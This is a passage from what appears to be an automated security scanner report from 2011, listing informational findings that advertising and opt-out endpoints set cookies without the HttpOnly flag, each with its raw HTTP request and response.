Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: D41U=3qBdjM8Fc6wmKGyDniBhVEEJ9ADx4miPR-XDn6vDrZGUndukkKo3FXw; admeld_opt_out=true

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 04 Sep 2011 11:22:32 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.networkadvertising.org/optout/opt_su
...[SNIP]...

16.192. http://tags.bluekai.com/site/2688  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2688

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/2688 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bko=KJpgaVaQRe3P814/zWTRhonkRt9/VCw7hX/QYVDh1x99gXz/vx==; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzkAOpWymeaXRhOxOT7Bi9u8Q81no/SE0b6OHO8LjZOGYXvkF0xW3adMsT1mDJiPTD/G5F69ctTQdQ==; bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACXnxf/99T1/x8JjZGZJLPkiLoZCujvOLSkaig7oCNBJ4Q9MxhUG; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRx1ppA5J4Q9fzyPp; bklc=4e62e20e; bk=yK5jSuJX+9Fze1lp; bkc=KJhnjsHQZB4By1e8v1ZwiRsO/Hc/MtaOXJ1asOQmdZJAIc930RXH0k5mR6eCQ2EeI/ZYe9p7JjQRZJeTupkHIueN1wTDqQRsBQ8sCFL7WUh5xyRDwAQ2MvXshcSNe9hfEAnzOIvczSc0x2cT/w6ydisQ/KrksOQ3GmSOImFxIYeN1nTD6nNfIjQRq1fc/4iX3cyJmxRDwAQdMwIBCTcCoQyEx29SOwI9/01v4p1SF2XWkU2SOjUFt1Z9yQ4jOIBpQFyI7RWC3HEOw2i1075gxmVeSOCdBjYdKE13lfGPkxI0nhcvOyevZsp1; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:27:55 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62e22b; expires=Tue, 06-Sep-2011 02:27:55 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
BK-Server: 160f
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

16.193. http://tags.bluekai.com/site/353  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/353

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/353?rand=0.6739487703889608 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bko=KJpgaVaQRe3P814/zWTRhonkRt9/VCw7hX/QYVDh1x99gXz/vx==; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzkAOpWymeaXRhOxOT7Bi9u8Q81no/SE0b6OHO8LjZOGYXvkF0xW3adMsT1mDJiPTD/G5F69ctTQdQ==; bklc=4e62caf0; bk=ZKGU/YJX+9Fze1lp; bkc=KJh5pfXnxPWDOdeFr6kIhdjb0D/tQfvHLCQBiA73wKDdDOSkjeOjknd9H9hFoqOCKnwJFt90ZBhEflS5B8hm7d3KzIT5o/cnNXeffgx199wodOe1FjYt7xWXD6eXKHwkogp0vQbW/yjKBINusz0DP0fv3AI9GfEylRNh5yvZKKVgUcvyQnsdMfywZwnvk7pFvuPxXdgSuVTpOtSSPdTAQs5VGnlEwMz1jM4QjRUfDKOrn1O128uM2wzNT/06npwr8ouqrFJVt7V83lBrrZ4fdQsk3V5a; bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACXnxf/99T1/x8JjZGZJLPkiLoZCujvOLSkaig7oCNBJ4Q9MxhUG; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:05:45 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62eb09; expires=Tue, 06-Sep-2011 03:05:45 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=7Eoi5uJX+9Fze1lp; expires=Fri, 02-Mar-2012 03:05:45 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhnjsHQZB4By1e8v1ZwCDsB/Hc/MtaOXJ1asOQmdZJAIc930xXGOKRgopsQXWc3R4hWxxSsXhJ1eWh/dvVz3c0xKCCdYMze9hLc/Xw2AyiIgiWeYCIAcLjU9tvfVQSswD9IW8x4hGUve6UMQdEeI/K9C30URZYGQJGcT32eTTwDydCuxw4r8VBiLeA4CIepGF/k8OCxIYe21wTlcQSsZpJ1eWagWwyeMGyGd1NGdcTEPw8oaPuIR0zeYC2AcTpwY4nf59Ssoa/Wdt9pv+I+9jDwGZcXNDeI8LtG4m+VPef/FAxGcyOlpt6z; expires=Fri, 02-Mar-2012 03:05:45 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 03:05:45 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 03:05:45 GMT
Cache-Control: max-age=86400, private
BK-Server: a094
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

16.194. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/invite-media-rtb/tokens/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/invite-media-rtb/tokens/ HTTP/1.1
Host: tap.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 04:19:38 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://pixel.rubiconproject.com/tap.php?v=5852&nid=2101&put=
Content-Length: 0
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Mon, 03-Sep-2012 04:19:38 GMT; Path=/
Set-Cookie: dq=2|2|0|0; Expires=Mon, 03-Sep-2012 04:19:38 GMT; Path=/
Set-Cookie: lm="4 Sep 2011 04:19:38 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close
Content-Type: text/plain; charset=UTF-8


16.195. http://timeslog.indiatimes.com/timeslog.dll/topcnt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timeslog.indiatimes.com
Path:   /timeslog.dll/topcnt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /timeslog.dll/topcnt?CHUR=timesofindia.indiatimes.com&randomno=0.19290760322473943 HTTP/1.1
Host: timeslog.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: dmid72=40790.3303205093vctr2; domain=timeslog.indiatimes.com; path=/; expires=Wed, 01 Sep 2021 07:55:39 GMT
Set-Cookie: chid30=40790.3303205093vctr2; domain=timeslog.indiatimes.com; path=/; expires=Wed, 01 Sep 2021 07:55:39 GMT
Set-Cookie: chid61=40790.3303205093vctr2; domain=timeslog.indiatimes.com; path=/; expires=Wed, 01 Sep 2021 07:55:39 GMT
Set-Cookie: chid44=40790.3303205093vctr2; domain=timeslog.indiatimes.com; path=/; expires=Wed, 01 Sep 2021 07:55:39 GMT
Expires: Mon, 08 Dec 2008 02:25:39 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

16.196. http://trk.tidaltv.com/ILogger.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.tidaltv.com
Path:   /ILogger.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ILogger.aspx?event=imp&type=5&adId=e5543049-bf4f-4504-83b8-2a8811b9f929&fmid=6759&mt=1&pid=852&rand=1149811380&mid=5164&pcid=11&pcv=75207&xf=12&g=5263&dr=1 HTTP/1.1
Host: trk.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adidt=7L0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ijl+fnJ2d/eKPjmdnszd1Nn1bLC+ajx597xd/9KwsLubtF/msyM5mHz369MH9h6OPXpbZNF/kyxYfHdzfG/GLHz36KL9/f//ezv7D7cn5/vn2/v2d/e2De5OD7b3s4GB3d/Lw/OHew49GH70pFvnrNlus6JXf9+7TrM23du/t3t/dubf36af0yyc79Nz5fe9+9Eu+/0v+nwAAAP//; uavpid=852; tpdpc=id%3d25%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d4%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d5%3border%3d-1%3bfreq%3d0%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d16%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM; tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:25:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Set-Cookie: tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be9e638884ad44aa0d1047ebf0; domain=tidaltv.com; expires=Fri, 02-Sep-2016 03:25:05 GMT; path=/
Set-Cookie: tpuav=1%3d3%3b2%3d1012%3b3%3d3%3b4%3d0; domain=tidaltv.com; expires=Fri, 02-Sep-2016 03:25:05 GMT; path=/
Cache-Control: private
Content-Type: image/gif
Content-Length: 52

GIF89a...................!..    ....,................;.

16.197. http://uav.tidaltv.com/3PDPHandler.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uav.tidaltv.com
Path:   /3PDPHandler.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /3PDPHandler.aspx?tpdp=25&app=3&segs= HTTP/1.1
Host: uav.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tidal_ttid=dd4e867c-c693-47de-91e1-d466af06b7be; adidt=7L0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ijl+fnJ2d/eKPjmdnszd1Nn1bLC+ajx597xd/9KwsLubtF/msyM5mHz369MH9h6OPXpbZNF/kyxYfHdzfG/GLHz36KL9/f//ezv7D7cn5/vn2/v2d/e2De5OD7b3s4GB3d/Lw/OHew49GH70pFvnrNlus6JXf9+7TrM23du/t3t/dubf36af0yyc79Nz5fe9+9Eu+/0v+nwAAAP//; uavpid=852

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 04 Sep 2011 03:23:21 GMT
Location: http://tags.bluekai.com/site/2688
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Server: Microsoft-IIS/6.0
Set-Cookie: tpdpc=id%3d25%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d4%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d5%3border%3d-1%3bfreq%3d0%3bignoretime%3d9%2f4%2f2011+12%3a00+AM%26id%3d16%3border%3d-1%3bfreq%3d-1%3bignoretime%3d9%2f4%2f2011+12%3a00+AM; domain=tidaltv.com; expires=Fri, 02-Sep-2016 03:23:21 GMT; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 277
Connection: keep-alive

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://tags.bluekai.com/site/2688">here</a>.</h2>
</body></html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Tra
...[SNIP]...

16.198. http://unitus.synergy-e.com/www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://unitus.synergy-e.com
Path:   /www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ajs.php?zoneid=2901&cb=70902175991&charset=UTF-8&loc=http%3A//www.nationmultimedia.com/&referer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok+thailand+news&ct0=http%3A//unitus.synergy-e.com/www/delivery/ck.php%3Foaparams%3D2__bannerid%3D6502__zoneid%3D874__cb%3D4341db1f25__oadest%3D&mmm_fo=1 HTTP/1.1
Host: unitus.synergy-e.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAGEO=CG%7C%10%7C%7C%7C-27%7C133%7C%7C%7C%7C%7C; OAID=e83aa70949564ddd51db0145710d44ec

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 02:26:06 GMT
Content-Type: text/javascript; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=e83aa70949564ddd51db0145710d44ec6b519a43d5516d503b44bdca; expires=Mon, 03-Sep-2012 02:26:57 GMT; path=/
Content-Length: 1083

var OX_c1134b00 = '';
OX_c1134b00 += "<"+"a href=\'http://unitus.synergy-e.com/www/delivery/ck.php?oaparams=2__bannerid=11127__zoneid=2901__cb=805c8ecf32__oadest=http%3A%2F%2Funitus.synergy-e.com%2Fww
...[SNIP]...

16.199. http://unitus.synergy-e.com/www/delivery/ck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://unitus.synergy-e.com
Path:   /www/delivery/ck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ck.php HTTP/1.1
Host: unitus.synergy-e.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 04:22:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=e83aa70949564ddd51db0145710d44ec%5D%5D%3E%3E; expires=Mon, 03-Sep-2012 04:22:03 GMT; path=/
Content-Length: 0


16.200. http://unitus.synergy-e.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://unitus.synergy-e.com
Path:   /www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=6739&campaignid=1728&zoneid=3130&loc=http%3A%2F%2Fwww.nationmultimedia.com%2F&referer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok+thailand+news&cb=fedfdc606b HTTP/1.1
Host: unitus.synergy-e.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=e83aa70949564ddd51db0145710d44ec

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 02:25:12 GMT
Content-Type: image/gif
Connection: keep-alive
X-Powered-By: PHP/5.2.10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=e83aa70949564ddd51db0145710d44ec; expires=Mon, 03-Sep-2012 02:25:12 GMT; path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

16.201. http://unitus.synergy-e.com/www/delivery/spc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://unitus.synergy-e.com
Path:   /www/delivery/spc.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/spc.php?zones=Nationmultimedia3130%3D3130%7C&nz=1&source=&r=57066460&charset=UTF-8&loc=http%3A//www.nationmultimedia.com/&referer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok+thailand+news HTTP/1.1
Host: unitus.synergy-e.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 02:25:09 GMT
Content-Type: application/x-javascript; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAGEO=CG%7C%10%7C%7C%7C-27%7C133%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=e83aa70949564ddd51db0145710d44ec; expires=Mon, 03-Sep-2012 02:25:09 GMT; path=/
Content-Size: 4182
Content-Length: 4182

var OA_output = new Array();
OA_output['Nationmultimedia3130'] = '';
OA_output['Nationmultimedia3130'] += "<"+"script language=\"JavaScript\" src=\"http://unitus.synergy-e.com/custom/richmedia/AC_Run
...[SNIP]...

16.202. http://web.adblade.com/impsc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /impsc.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /impsc.php?cid=1083-2742610312&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __sgs=E9sOpfn38Vyk9ev7mYc4l253DJxNrTy2kDg72IC7%2BsE%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __impt=1315103963.766653954479; expires=Mon, 05-Sep-2011 02:39:23 GMT; path=/
Content-type: text/html
Date: Sun, 04 Sep 2011 02:39:23 GMT
Server: lighttpd/1.4.21
Content-Length: 8255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html;
...[SNIP]...

16.203. http://www.adadvisor.net/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adadvisor.net
Path:   /nai/optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai/optout?nocache=0.5190331 HTTP/1.1
Host: www.adadvisor.net
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=0001%3AR2FJHgNFRQ4Qt9W2tXVkxDaOpLVexjtt

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 11:23:42 GMT
Server: Apache
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Set-Cookie: ab=opt-out; Domain=.adadvisor.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: aa=opt-out; Domain=.adadvisor.net; Expires=Wed, 01-Sep-2021 11:23:42 GMT; Path=/
Location: http://www.adadvisor.net/nai/verify
Content-Length: 0
Connection: close
Content-Type: text/plain


16.204. http://www.adbrite.com/mb/nai_optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adbrite.com
Path:   /mb/nai_optout.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mb/nai_optout.php?nocache=0.5932995 HTTP/1.1
Host: www.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirOLM3IrzEsr0xMN6sxqjEsyShW0lFKSszLSy3KBKtQqq0FAA%3D%3D"; vsd=0@1@4e62cac8@cdn.turn.com; rb=0:742697:20828160:2925993182975414771:0; rb2=CiMKBjc0MjY5Nxie3fO1NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; srh="1%3Aq64FAA%3D%3D"

Response

HTTP/1.1 302 Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 11:13:43 GMT
Location: http://www.adbrite.com/mb/nai_optout.php?set=yes
P3P: policyref="http://www.adbrite.com/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache
Set-Cookie: ut=deleted; expires=Sat, 04-Sep-2010 11:13:42 GMT; path=/; domain=.adbrite.com
Set-Cookie: b=deleted; expires=Sat, 04-Sep-2010 11:13:42 GMT; path=/; domain=.adbrite.com
Set-Cookie: untarget=1; expires=Wed, 01-Sep-2021 11:13:43 GMT; path=/; domain=adbrite.com
Content-Length: 0


16.205. http://www.addthis.com/api/nai/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/nai/optout?nocache=0.8710141 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
